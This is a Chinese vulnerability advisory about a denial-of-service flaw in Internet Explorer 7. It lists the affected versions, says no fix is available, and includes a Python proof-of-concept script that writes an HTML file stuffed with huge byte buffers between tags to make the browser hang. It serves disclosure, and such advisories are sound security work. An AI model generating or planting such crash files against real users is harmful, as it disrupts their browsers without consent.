Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer处理HTML存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
构建如下恶意的HTML代码,诱使用户使用IE处理,可导致应用程序崩溃:
# usr/bin/python
print "-------------------------------------------------------------------------"
print " Internet Explorer 7.0.5730.11 Denial of Service"
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " For convenience I post up a script in python that create a .html file"
print " You can open it locally, upload and browse it or directely browse here:\n"
print " http://www.shinnai.altervista.org/ie_dos.html\n"
print " About 60 seconds and IE7 stops to answer "
print "-------------------------------------------------------------------------"
tagHtml = "<html>"
tagHtmlC = "</html>"
tagHead = "<head>"
tagHeadC = "</head>"
tagTitle = "<title>"
tagTitleC = "</title>"
buff= "\x90" * 80000
boom = tagHtml + buff + tagHead + buff + tagTitle + buff + tagTitleC + tagHeadC + tagHtmlC
try:
fileOut = open('ie_dos.html','w')
fileOut.write(boom)
fileOut.close()
print "\nFILE CREATED!\n'NJOY IT...\n"
except:
print "\nUNABLE TO CREATE FILE!\n"
Microsoft Internet Explorer 7.0 beta3
Microsoft Internet Explorer 7.0 beta2
Microsoft Internet Explorer 7.0 beta1
Microsoft Internet Explorer 7.0
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
目前没有解决方案提供:
<a href="http://www.microsoft.com/windows/ie/" target="_blank">http://www.microsoft.com/windows/ie/</a>
京ICP备10040895号
暂无评论